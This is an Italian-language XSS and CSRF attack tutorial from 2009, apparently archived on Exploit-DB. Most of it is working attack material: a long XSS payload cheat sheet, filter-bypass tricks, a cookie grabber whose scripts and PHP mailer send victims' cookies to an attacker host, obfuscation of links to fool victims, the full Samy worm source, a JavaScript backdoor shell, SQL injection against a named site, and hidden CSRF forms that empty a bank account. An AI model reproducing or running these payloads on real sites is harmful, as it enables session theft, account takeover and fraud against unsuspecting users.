[Italian] XSS:Cross Site Scripting

EDB-ID:

12884

CVE:

N/A

Author:

XaDoS

Type:

papers

Platform:

Multiple

Published:

2009-08-07

                 .____________________________________.
                 |+----------------------------------+|
                 || --//XSS:Cross Site Scripting//-- ||
                 ||              [!]                 ||
                 ||            c0de by               ||
                 ||      XaDoS & MassaKretor         ||
                 |+----------------------------------+|
                 *^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^*
[!]Indice:

   1. Cosa sono le XSS
   2. Come utilizzarle + cheats
   3. Analisi di un attacco
   4. Come eludere i filtri
   5. Sfruttare le XSS con un Cookie Grabber
   6. Offuscamento dell'url
   7. XSS non Sfruttabili
   8. Altri tipi di XSS
   9. Eseguire Codice Remoto
  10. XSS W0rm
  11. JavaScript Shell: inniettare una Backdoor tramite XSS
  12. SQL + XSS =... le XFS
  13. CSRF o XSRF: Cross Site Request Forgery / Sea Surf
  14. Post_fazione + ringraziamenti



//Start-0x01\\


[+]Cosa Sono

Le vulnerabilit‡ di tipo Cross Site Scripting ( XSS ) sono vulnerabilit‡ che affliggono 

davvero una mole di siti web dinamici e fanno parte della famiglia dei Code Injection.
Le XSS non sono nient'altro che una modifica dei parametri  HTTP GET e  HTTP POST attraverso 

l'esecuzione di codice Javascript a livello di url, inserito opportunamente in una variabile 

o pi˘.






[+] How To: Come Utilizzarle

In se scoprire un' XSS	non Ë un'impresa difficile, e per sfruttarla basta semplice codice 

javascript... L'esempio pi˘ comune Ë il classico:

"><script>alert('prova xss')</script> 

Analizziamolo:
 
"> non fa altro che chiudere il tag della richiesta.
<script></script> invece comprede il codice javascript da eseguire, in questo caso 

alert('prova') che a sua volta non fa altro che far apparire a schermo un Alert con scritto 

'prova'.

Se vedete apparire l'alert, vuol dire che siete in grado di inserire codice javascript e che 

il sito non filtra bene le richieste, insomma: Ë vulnerabile. Vediamo se Ë possibile 

visualizzare i nostri Cookie in un Alert:

"><script>alert(document.cookie)</script>

Se nell'alert appaiono i nostri cookie allora vuol dire che il sito Ë completamente 

vulnerabile, cioË possiamo indurre il browser a fare tra le pi˘ svariate operazioni, ad 

esempio salvare i Cookie stampati a schermo su un nostro spazio web, oppure creare una 

codice che redirecti la vittima su un sito scelto da noi.

Tutto questo nel migliore dei casi, altrimenti basta analizzare l'url e modificare 

leggermente il nostro codice Javascript, inserendo al posto della normale stringa 

<script>..</script> altro tipo di codice, esistono centinaia di cheat sheet su internet, qui 

riporto le pi˘ aggiornate ed usate:

<script>alert(1);</script>

<script>alert('XSS');</script>

<script src="http://www.evilsite.org/cookiegrabber.php"></script>

<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.co

okie)</script>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<script>alert(String.fromCharCode(88,83,83))</script>

<img src=foo.png onerror=alert(/xssed/) />

<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>

<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>

<marquee><script>alert('XSS')</script></marquee>

<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">

<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

"><script>alert(0)</script>

"><script src=http://yoursite.com/your_files.js></script>

</title><script>alert(/xss/)</script>

&lt;/textarea&gt;<script>alert(/xss/)</script>

<IMG LOWSRC=\"javascript:alert('XSS')\">

<IMG DYNSRC=\"javascript:alert('XSS')\">

<font style='color:expression(alert(document.cookie))'>

'); alert('XSS

<img src="javascript:alert('XSS')">

<script language="JavaScript">alert('XSS')</script>

[url=javascript:alert('XSS');]click me[/url]

<body onunload="javascript:alert('XSS');">

<body onLoad="alert('XSS');"

[color=red' onmouseover="alert('xss')"]mouse over[/color]

"/></a></><img src=1.gif onerror=alert(1)>

window.alert("Bonjour !");

<div 

style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))"> 

<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
 
"><script alert(String.fromCharCode(88,83,83))</script>

'>><marquee><h1>XSS</h1></marquee>

'">><script>alert('XSS')</script>

'">><marquee><h1>XSS</h1></marquee>

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">

<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; 
URL=http://;URL=javascript:alert('XSS');\">

<script>var var = 1; alert(var)</script>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

<IMG SRC='vbscript:msgbox(\"XSS\")'>

 " onfocus=alert(document.domain) "> <"

<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>

<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out

perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out

<br size=\"&{alert('XSS')}\">

<scrscriptipt>alert(1)</scrscriptipt>

</br style=a:expression(alert())>

</script><script>alert(1)</script>

"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

[color=red width=expression(alert(123))][color]

<BASE HREF="javascript:alert('XSS');//">

Execute(MsgBox(chr(88)&chr(83)&chr(83)))<

"></iframe><script>alert(123)</script>

<body onLoad="while(true) alert('XSS');">

'"></title><script>alert(1111)</script>

&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

'""><script language="JavaScript"> alert('X \nS \nS');</script>

</script></script><<<<script><>>>><<<script>alert(123)</script>

<html><noalert><noscript>(123)</noscript><script>(123)</script>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

'></select><script>alert(123)</script>

'>"><script src = 'http://www.site.com/XSS.js'></script>

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

<SCRIPT>document.write("XSS");</SCRIPT>

a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);

='><script>alert("xss")</script>

<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>

<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>

">/XaDoS/><script>alert(document.cookie)</script><script 

src="http://www.site.com/XSS.js"></script>

data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=






[+]Analisi di un attacco

Il sito www.caziotio.it ha un campo search, proviamo a cercare il nostro codice javascript e 

l'url generato dovrebbe essere cosÏ:

http://www.caziotio.it/default.asp?rif=1&tiporicerca=2&strRicerca1=
%22%3E%3Cscript%3Ealert('prova');%3C/script%3E&strRicerca2=
&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0 

Vediamo che la variabile strRicerca1 contiene il nostro codice. Proviamo a Passarlo 

direttamente e togliere le parti superflue:

http:www.caziotio.it/default.asp?rif=1&tiporicerca=2&str
Ricerca1="><script>alert(document.cookie);</script> 

Ecco che ìForseî vedremo i nostri cookie apparire a schermo.






[+]Come Eludere I Filtri

Molte volte i fitltri si occupano semplicemente di cancellare o alterare, se presenti, 

determinati simboli o parole, tipo chessÚ aggiungere uno ì/ ì se il primo carattere Ë ì<î, 

oppure altri metodi non molto efficaci e facilmente oltrepassabili.

Il metodo pi˘ classico per eludere certi filtri Ë chiudere il tag, aggiungendo ì> prima del 

codice da eseguire.
Molte molte invece ci si trova davanti ad un filtro creato con una semplice stringa del 

tipo:

$var = str_replace ("<script>", "script", $var);

Che blocca l'uso di <script> & di script, impedendoci di eseguire il codice javascript tra i 

due tag. In questo caso Ë facile, basta usare un qualunque altro codice javascript come 

quelli sopra riportati:

<IMG SRC='vbscript:msgbox(\"XSS\")'>

Altre volte invece possimao trovarci davanti ad un particolare filtro chiamato addslashes 

che si occupa appunto di aggiungere un carattere '\' davanti a tutti i caratteri ' , in tal 

modo rende nullo il codice.
Come bypassarlo? Semplice:  o codifichiamo i nostri codici javascript che vogliamo immettere 

nell alert in decimali(&#116),hex(%74%0A),ascii(abct) e base64(dAoK); oppure cerchiamo un 

codice javascript che non usi i caratteri bloccati, esempio:

}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>

o

<script>alert(1);</script>

Come detto sopra ci sono moltissime cheat sheet su internet e poi basta imparare il 

javascript e con poche modifiche si riescono ad eludere filtri apparentemente impossibili, 

dipende tutto da voi e dalla vostra fantasia.






[+]Sfruttare XSS Con Un Cookie Grabber

Indubbiamente il metodo pi˘ usato e il pi˘ ìefficaceî.
Consiste nell'includere un file javascript nella variabile che viene stampata, il quale file 

richiama una pagina in php che si occupa di loggare i Cookie dell'user che apre il link 

appositamente preparato.

Praticamente:

Codice Javascript:

"><script src="http://www.nostrosito.com/cookiescript.js"></script>

All'interno del file cookiescript.js ci scriveremo il codice che passa il Cookie ad una 

pagina php:

<script>location.href="http://nostrosito.com/cookie.php?cookie=</script>

Il file cookie.php invece conterr‡ il codice php che si occupa di farci recapitare il 

cookie:

<? mail("nostra@mail.com","Ecco il cookie rubato",$_GET['cookie']; ?>

Uppato il tutto l'url sar‡ all'incirca:

http://www.caiotizio.it/default.asp?rif=1&tiporicerca=2&strRicerca1="><script 

src="http://www.nostrosito.com/cookiescript.js"></script>


[+]Offuscamento dell'url

Ora dobbiamo occuparci di come nascondere l'url sopra descritta in modo tale che un utente 

normale non si accorga di nulla (molte persone non si accorgono neppure di un link con 

all'interno del javascript code ben in vista,comunque noi facciamo le cose per bene)

Abbiamo diverse opzioni:

1#-- P0ssiamo nascondere l'url attraverso alcuni servizi quali tinyurl(www.tinyurl.com),che 

ci permette di rendere un qualsiasi indirizzo web qualcosa del tipo: 

http://tinyurl.com/2rery1


2#-- Possiamo convertire l'intera url in hex:

http://www.caiotizio.it/default.asp?rif=1&tiporicerca=2&strRicerca1=223e3c736372697074207372

633d22687474703a2f2f7777772e6e6f7374726f7369746f2e636f6d2f636f6f6b69657363726970742e6a73223e

3c2f7363726970743e

In questo modo sembrer‡ un normalissimo link.

Se L'utente aprir‡ il link e tutto va a bu0n fine vedremo nella nostra casella postale i 

c00kie della vittima in questi0ne.








[+]XSS Non Sfruttabili

Alcuni siti web hanno avuto almeno la furbizia di filtrare le richieste HTTP POST ed HTTP 

GET in modo da non consentire redirect e quindi furto di Cookie.
PerÚ se riusciamo comunque ad eseguire del codice esterno, possiamo tuttavia creare una 

pagina web simile a quella originale ed usarla per appropiarci di password o altri dati 

sensibili.

Esempio:
Pagina da includere: http://vuln.xssed.net/thirdparty/scripts/ckers.org.js

L'url del sito sar‡:

http://sitovittima.it/paginavulnerabile.php?varvuln="><script 

src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.js"></script>

La pagina in js, se il sito non filtra, puÚ anche essere scritta in HTML, e sar‡ quindi
http://sitodelpoverocaio.it/paginavulnerabile.php?varvuln="><script 

src="http://vuln.xssed.net/thirdparty/scripts/ckers.org.html"></script>

In questo modo all'url creato corrisponder‡ la pagina che in js ( o HTML ) che abbiamo 

incluso.







[+]Altri tipi di XSS:

CHi ha mai dett che in una xss possiamo solo inserire un testo o far comparire un alert o 

giocare con i cookie..?
POssiamo fare molte altre cose come includere immagini,video,redirect e quant'altro..
Ecco qui di seguito una piccola lista di codice Javascript alternativo:

Stampare un'immagine nella pagina vulnerabile:

<IMG SRC="http://www.tuosito.com/img.png">

Visualizzare un video:

<EMBED SRC="http://www.tuosito.com/video.swf">

Redirect verso un altra pagina web\video\immagine:

<script>window.open("http://www.tuosito.com/pagina.html")</script>

 *al posto di ../pagina.html possiamo mettere tutto: video.swf / img.png   / ecc..






[+]Eseguire Codice Remoto

Supponiamo che tutti i metodi provati falliscano.
C'Ë sempre una scappatoia.
I filtri bloccano i caratteri HTML contenuti nelle variabili di testo. E se il codice Ë 

inserito in un'immagine?
Non c'Ë problema, possiamo inserire codice Javascript nell'immagine stessa:

Prima di tutto dobbiamo identificare l'estensione dell'immagine(gif,bmp,jpg..), una volta 

trovata apriamo l'immagine con un editor di testo qualunque (blocco Note per windows e 

kwrite per linux)

Ci troveremo davanti ad un codice lunghissimo del genere:
(esempio codice di un immagine .gif):

GIF89aÌ ^˜˚ 

/%,4*,30+1.5I3M7f/K2e21N46hD:5I7J6;d6FTKlau4JQ3Oj9eR8dmMK2M.O15jl0n0m45HIRkN3MO8ieHj7Lh:mQJO

O6RcSg6pGoL6jpjp6PMOOPnThNRjnnNPmQmnnOono48à>>§VÅfÅ 

~π6Nå9Tß8gè7l©3t≈d9éPRãTU©RmèTo™nPíuS©poèsn≠QSƒXk«rW∆tq«wtÊYÉ6|Åsã6s•=WÑNXÉptäNsâpxßQv©nxÃd6

è±/ûÃUÖìUåÆP•ïrãêsç≠y¶ìvß±t°Ã|›®w≈◊ó65ó8MëJèM6îqèm8±QÆN7¨m∞k7éQNçTlêlRènoÆQMÆTmØnRÆqoÃ97«9LÕ

X8…RM…Uj oRÀsoÁTL‰VmÂqQÊsní5û•4–äUèàU¨èqèën±¨Wå≠T±Æté¨u≠ùp……:±«4—ÕtëÀp“üá 

åî8ñ®:Æé7ÆÆ8êìOëèoñ©Pñ™n∞éS∞éq¨ØRØØo¥»7ó«Ró…mçÂZó‰f±≈S¥∆p¨Âsÿ°6ÃéUŒêpÕ´U–¨oÂèUÂìpÁ≠TÊ≠p·Ã5…»

R……r›ÁN–‰wÏÕMÍ…sÛÏVıÚsëèëëêÆï™íï¨∞∞èêÆìÆ∞Æë∞Ø∞îë ñïÂî∞Ãî≥ÂÆíÃ¥îÂ∞∞ñ±Êô«ìò»±êÓõïÔÆ¥»ë≤…±¥„î±

ͱò»œó ÂöÁŒñÊαÌ≤ŒÁ∂‰–∂ÊÍÃíè ï¨œ≠íŒ∞ÆÊïçËñ´ÊØíÁ≥≠«ñÕ…óÍÀ≤ÀŒØÓËï „íÒÁ¥…Â≥ˆÕÃîœÃ∞‘Âó‘Â∞ÈÃïËÕ∞

ÍÁòÎȱ՜ŒŒ—Ë—Ê—“ÁÍÈ—ŒÈ“ÏÏÍ–ÓÓ               !ˇ
NETSCAPE2.0    !˘   ˇ ,    Ì ^ ˛  [ecc.......]

L'importante Ë notare i primi caratteri, poichË sono sempre gli stessi:

GIF89a

Ora cancelliamo tutto tranne questi pochi caratteri iniziali(che servono per riconoscere ed 

accettare questo file come .gif)
Ed inseriamo l'ormai famoso codice Javascript:

GIF89a<script>alert("XSS")</script>

Ora salviamo l'immagine (sempre in .gif) e facciamo l'upload sul sito vittima / forum / 

sezione commenti ..
Ora questa xss Ë diventata permanente poichË chiunque vada sull'url contenente questa 

immagine.gif potr‡ oservare il nostro alert!
(Mozilla FireFox non mostra sempre questi tipi di alert, IE invece si)

Ricordiamoci che per ogni estensione di immagine quei pochi caratteri cambiano, qui vi 

riporto una lista dei suddetti caratteri:

-PNG = âPNG

-GIF = GIF89a

-JPG = ˇÿˇ‡ JFIF

-BMP = BMF÷





[+] XSS W0rm:

Questo Ë un argomento non molto sviluppato proprio perchË Ë ancora in fase di sviluppo, 

basti pensare infatti che il primo w0rm legato alle XSS Ë nato nel 2005 e si chiamava Samy;
Samy era un w0rm per myspace,e per evitare le restrizioni del provider, che non consente 

l'upload di javascript, l'utente ha inserito lo script nei CSS e Internet Explorer ha fatto 

il resto. Il codice, infatti, avrebbe dovuto essere considerato un CSS non valido, ma IE lo 

ha eseguito e lo ha fatto propagare per i membri della community.
Attraverso questo verme Samy ha infettato pi˘ di un milione di account e continuava a 

replicarsi aggiungendo amici al profilo dell utente creatore del w0rm.(alle 9.30 della 

stessa notte le richieste erano milioni e continuavano ad affluire ogni millesimo di 

secondo, cosÏ facendo myspace Ë caduto ed Ë andato offline)
Code of Samy:

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var 

A=String.fromCharCode(39);function g(){var C;try{var 

D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return 

eval('document.body.inne'+'rHTML')
}}
function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function 

getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var 

AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var 

J;var AS=getQueryParams();var L=AS['Mytoken'];var 

M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.

myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function 

getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function 

paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var 

Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q

=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return 

false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeade

r('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK

.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var 

S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function 

getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function 

getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var 

V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var 

Y=W.substring(0,X);return Y}function getXMLObj(){var 

Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else 

if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new 

ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var 

AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var 

AE=AC.substring(0,AD);var 

AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' 

but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function 

getHome(){if(J.readyState!=4){return}var 

AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(

AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new 

Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();

httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',params

ToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var 

AR=getFromURL(AU,'Mytoken');var AS=new 

Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getH

iddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='

+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var 

BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSen

d(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_v

erify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function 

processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var 

AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new 

Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to 

Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POS

T',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return 

false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xml

http2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setReque

stHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>


Ora, senza stare a spiegare riga per riga possiamo capire che i w0rm xss sono pericolosi per 

sistemi e community quali myspace,yahoo ecc..
Vi basti pensare che in tutto i w0rm si contano sulle dita:

DATA:           NOME W0RM        BERSAGLIO

01/11/2008      New Orkut Worm 	 Orkut
08/07/2008 	JustinTV Worm 	 Justin TV
24/01/2008 	Yamanner 	 Yahoo! Mail Service
24/01/2008 	hi5 Worm 	 hi5
24/01/2008 	Gaia Worm 	 Gaiaonline
24/01/2008 	Orkut Worm 	 Orkut
24/01/2005 	Samy Worm        Myspace

Non reputo ci sia molto altro da dire, per questo argomento non ci sono regole o tutorial, 

ognuno dovrebbe riuscire a trovare una vulnerabilit‡ che gli permetta di inserire codici 

simili a questie comunque sia, non Ë una cosa che personalmente mi interessa.






[+] JavaScript Shell -  XSS & Backdoor

Ora parliamo di una cosa m000lto c00l!! ;-)
Sfruttiamo una vulnerabilit‡ XSS per inniettare una backdoor a discapito di un povero user 

vittima.

Procedimento:
Grazie ad un apposito tool creato da Inj3ct-it crew possiamo fare qualcosa di molto pi˘ 

pericoloso che un semplice alert, anche questa Ë una delle tecniche che le persone non 

conoscono con le XSS e cosÏ facendo, restando ingnoranti, e le sottovalutano.

Requisiti 2 files:

-JsBack.php (from Inj3ct-it)

-shell.js (from Inj3ct-it)

Come primo passo dobbiamo uplodare sul nostro sito i 2 files jsback.php & shell.js,
e modificare le impostazioni iniziali( password e username per accedere nel file jsback.php 

mentre in shell.js dobbiamo settare l'url e altro(troverete istruzioni dettagliate 

all'interno dello stesso)).
Adesso supponiamo di aver trovato un xss su un sito che ci permette di includere javascript 

code, possiamo quindi scrivere:

http://sitovittima.com/vuln.php?x=1">/XaDoS/><script 

src="http://nostrosito.com/shell.js"></script>

facendo cliccare come al solito alla vittima il nostro cattivissimo indirizzo questa volta 

succeder‡ qualcosa di diverso:

Essendo l'utente collegato e loggato ad il sitovittima in questione attraverso la shell.js 

nella nostra pagina privata jsback.php ci appariranno i suoi cookies! ma non solo: il suo 

ip, informazioni riguardanti la sua macchina ecc.. in pi˘ grazie a questa particolare pagina 

ci sono altre funzioni come keylogger/esecuzione comandi/proxy/ CSRF(di cui tratterÚ nel 

prossimo capitolo) ecc
che perÚ potrete vedere sul sito degli autori (Inj3ct-it).

Capite quindi che .. non si scherza con le XSS !! ;-)
 





[!] Le XSS stanno sempre bene con le SQL: una dentro l'altra

Quanti di voi sanno quanto spesso cpaita che uno trovi una SQL e scopri in seguito che la 

stessa variabile buggata Ë vuln a XSS; oppure, ancora meglio, quante volte capita che ci si 

trova davanti ad una XSS e poco dopo trovi qualcuno che ti dice:"hey! ma qui c'Ë un sql!"( 

s3rg3770 :) )
Bene possiamo quindi giungere alla conclusione che stanno bene insieme.

Ma se vi dicessi che UNa puÚ perfino stare dentro l'altra?
suona strana come frase vero..
VI spiego bene:
Semplicemente una volta trovata una sql, possiamo benissimo usare il nostro solito comando 

char()

in modo un po' stravagante:

come sappiamo di solito inseriamo del codice, convertito in ASCII. Ma allora se provassimo 

ad inserire codice JavaScript ?? su, proviamoci.
Passiamo subito al codice:

abbiamo la nostra tipica XSS:

<script>alert('xssbyXaDoS')</script>

e vorremmo inserirla nell'SQL..ma ricordiamoci
che dobbiamo convertirla in ASCII per far si che ritorni l'alert;
quindi attraverso un normalissimo ASCII converter nel web la convertiamo in:

60 115 99 114 105 112 116 62 97 108 101 114 116 40 39 120 115 115 98 121 88 97 68 111 83 39 

41 60 115 99 114 105 112 116 62 

bene.
ora sfruttiamo un po' di conoscenze in ambito sql, cmoe sappiamo dovremo separare i numeri 

da virgole, al posto degli spazi in questo modo:

60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,120,115,115,98,121,88,97,68,111,83,39,

41,60,115,99,114,105,112,116,62 

ora possiamo metterlo dentro il nostro comandino magico..

char(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,98,121,120,97,100,111,115,

39,41,60,47,115,99,114,105,112,116,62)

ed ora..bhe, riprendiamo la nostra SQL
ex.
http://www.aslromah.it/news/home_notizia.php?ID_News=-99%20union%20all%20select%201,2,3,4,5,

6,7,8,910,11,12--

leggiamo il numero in cui printera i risultati, nel nostro caso il 4, ed inseriamo il codice 

ascii.ORA dovremmo avere:

http://www.aslromah.it/news/home_notizia.php?ID_News=-99%20union%20all%20select%201,2,3,char

(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,120,115,115,98,121,120,97,100,111,115,39,4

1,60,47,115,99,114,105,112,116,62),5,6,7,8,9,10,11,12--

linkate..eh...puff
appere il nostro alert dentro l'SQL. Semplicemente inutile ma.. divertente. 



[!] CSRF o XSRF: Cross Site Request Forgery


Ora che abbiamo concluso con le XSS vorrei presentare un attacco simile ma non certamente 

uguale alle XSS, pi˘ potente Ë pi˘ dannoso per un ignara vittima.

Innanzitutto bisogna capire la sostanziale differernza tra le XSS e le CSRF: Ë molto 

semplice, mentre le Xss si basano sullo spingere un determinato user a cliccare su un url 

maligna in modo tale da prelevare i suoi cookies o le sue informazioni di accesso ad un sito 

web, Le CSRF si basano sullo sfruttamento di un user vittima che, essendo loggato ad un 

determinato sito, ci permette di eseguire codici maligni attraverso il suo stesso account. 

Proprio per questo Ë una tecnica pi˘ difficile da individuare ed eliminare per un admin, 

poichË tutte le azioni commesse risulteranno eseguite da un user qualunque(la nostra 

vittima,che non sospetta di nulla).

Riassumendo quindi le Cross Site Request Forgery ci permettono di spedire qualunque tipo di 

richiesta HTTP ad un sito attraverso una specifica vittima che compier‡ ogni azione per noi 

a suo discapito.

Vediamo ora pi˘ nel dettaglio questo tipo di tecnica:

Ipotizziamo( e scrivo ipotizziamo perchË se fosse cosÏ semplice sarei miliardario) che un 

utente Ë loggato ad un sito che permette di avere alcuni servizi speciali quali il possesso 

di un conto bancario ed il trasferimento di soldi ($.$).
Avendo quindi un normale account il sito permette a questa persona di eseguire alcune 

transazioni monetarie.
Il codice quindi di una pagina per trasferire soldi in un servizio di e-banking potrebbe 

essere in generale: 

<form method="POST" action="spediscoeuro.php" name="spediscoeuro">
        <div>Quanto trasferisci: <input type="text" name="euro"></div>
        <div>A:   <input type="text" name="toname"></div>
        <div>lol: <input type="text" name="tolol"></div>
        <div>asd: <input type="text" name="toasd"></div>
        <div>omg: <input type="text" name="toomg"></div>
        <div><input type="submit" name="submit" value="Buy"></div>
     </form>

attraverso queste righe un user puÚ trasferire denare su un diverso account bancario (nella 

realt‡ non Ë cosÏ semplice ma Ë solo per farvi capire)

Quando l'utente spedisce la richiesta la pagina spediscieuro.php eseguir‡ il trasferimento, 

attraverso un codice del tipo:

/* spediscieuro.php */
     <?
     session_start();
     if(isset($_REQUEST['euro']))
          $euro = $_REQUEST['euro'];
     else
          die("Specificare la somma di denar0!"); //toname sarebbe l'account destinatario , 

quello che riceve la somma
     if(isset($_REQUEST['toname']))
          $toname = $_REQUEST['toname'];
     else
          die("Specificare dove trasferire la somma");
     if(isset($_REQUEST['tolol']))
          $toabi = $_REQUEST['tolol'];
     else
          die("specificare lol");
     if(isset($_REQUEST['toasd']))
          $tocab = $_REQUEST['toasd'];
     else
          die("Specificare asd");
     if(isset($_REQUEST['toomg']))
          $tocin = $_REQUEST['toomg'];
     else
          die("Specificare omg");
     
     
     send_money($euro, $toname, $tolol, $toasd, $toomg);
      
     ?> 


Ora un attaccante, grazie ai REQUEST potrebbe usufruire di richieste GET maligne, per 

spedire i soldi in un determinato posto , rubandoli.
Ora arriva la parte importante:
Noi attaccanti dobbiamo riuscire a dirigere l'utente, mentre Ë loggato alla banca, su una 

pagina web nostra o anche su un immagine o video..
esempio:(mentre l'utente sta guardando il suo ammontare per esempio..)
ATTACCANTE:"Vieni a vedere questa bellssima foto! Link: http://sitonostro/immagine.html"

Ora la pagina ../immagine.html dovrebbe essere struttura pi˘ o meno cosÏ:



   <html>
    <head><title>Immagine bellissima</title></head>
    <body>
 <img 

src="http://bancavittima.it/spediscieuro.php?euro=TUTTI&toname=HACKER&tolol=123456&toasd=123

456&toomg=X">
    </body>
   </html>


Come potete osservare da soli, l'utente mentre guarda l'immagine bellissima Ë 

contemporaneamente collegato alla banca ed eseguir‡ ignaro di tutto un trasferimento di 

TUTTI i suoi soldi verso HACKER(attaccante). Ora avete capito? qui sta la bellezza di questi 

tipi di attacco: Ë l'utente che tramite i suoi cookie e il suo account esegue richieste HTTP 

pi˘ o meno dannose per noi(in questo caso direi m0lto dannose!!).


Ora, probabilmente nessuna banca Ë cosÏ stupida da usare richieste come REQUEST ma 

probabilmente userebbe per un transito monetario richieste POST. In questo caso la nostra 

pagina immagine.html sarebbe diventata:


     <html>
     <head>
     <title>Immagine bellissima</title>
     <script>
     rubaeuro() {
          iframe = document.frames["rubaeuro"];
          iframe.document.ruba.submit();
     }
     </head>
     <body onload="rubaeuro()">
     <div><img src="immagine_vera_bellissima.jpg"></div>
     <iframe name="rubaeuro" display="none">
          <form method="POST" name="ruba"
           action="http://bancavittima.com/spediscieuro.php">
               <input type="hidden" name="euro" value="TUTTI">
               <input type="hidden" name="toname" value="HACKER">
               <input type="hidden" name="tolol" value="123456">
               <input type="hidden" name="toasd" value="123456">
               <input type="hidden" name="toomg" value="X">
          </form>
     </iframe>
     </body>
     </html>


iniziate a capire da soli vero ;-) ?
Attraverso la sessione ATTIVA dell'utente alla banca eseguiamo le nostre richieste di 

trasferimento !
Questo era solo un esempio per farvi capire la pericolosit‡ di un bug del genere in siti di 

e-banking o simili.








[+]P0st_fazione + Ringraziamenti

